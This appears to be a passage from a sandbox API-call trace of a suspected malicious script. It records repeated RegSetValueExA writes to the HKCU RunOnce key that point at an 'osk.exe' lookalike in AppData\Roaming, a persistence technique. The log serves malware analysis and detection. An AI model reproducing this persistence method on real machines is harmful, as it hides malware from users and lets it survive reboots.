FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.723] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.723] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4d [0079.723] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.723] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4e [0079.723] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.723] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4d [0079.724] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.724] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.724] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.724] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.724] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.724] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.724] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.724] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.724] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.724] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.726] RegCloseKey (hKey=0x280) returned 0x0 [0079.726] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.726] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.726] SetTimer (hWnd=0x20280, nIDEvent=0x204d, uElapse=0xa, lpTimerFunc=0x0) returned 0x204d [0079.726] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.737] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.737] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.738] KillTimer (hWnd=0x20280, uIDEvent=0x204d) returned 1 [0079.738] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.738] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.738] IUnknown:Release (This=0x787518) returned 0x1 [0079.738] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.738] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.738] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.738] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.738] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.738] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.738] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.739] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.739] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.739] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4e [0079.739] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.739] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4f [0079.739] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.739] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4e 
[0079.740] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.740] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.740] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.740] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.740] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.740] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.740] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.740] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.740] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.740] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.740] RegCloseKey (hKey=0x280) returned 0x0 [0079.740] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.741] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.741] SetTimer (hWnd=0x20280, nIDEvent=0x204e, uElapse=0xa, lpTimerFunc=0x0) returned 0x204e [0079.741] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.753] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.753] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.753] KillTimer (hWnd=0x20280, uIDEvent=0x204e) returned 1 [0079.753] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.753] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.753] IUnknown:Release (This=0x787518) returned 0x1 [0079.753] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.753] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.753] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.754] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.754] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4f [0079.754] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.754] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x50 [0079.754] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.755] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4f [0079.755] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.755] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.755] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0079.755] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.755] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.755] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.755] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.755] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.756] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.756] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.756] RegCloseKey (hKey=0x280) returned 0x0 [0079.756] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.756] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.756] SetTimer (hWnd=0x20280, nIDEvent=0x204f, uElapse=0xa, lpTimerFunc=0x0) returned 0x204f [0079.756] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.768] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.768] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.768] KillTimer (hWnd=0x20280, uIDEvent=0x204f) returned 1 [0079.769] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.769] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.769] IUnknown:Release (This=0x787518) returned 0x1 [0079.769] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.769] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.769] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
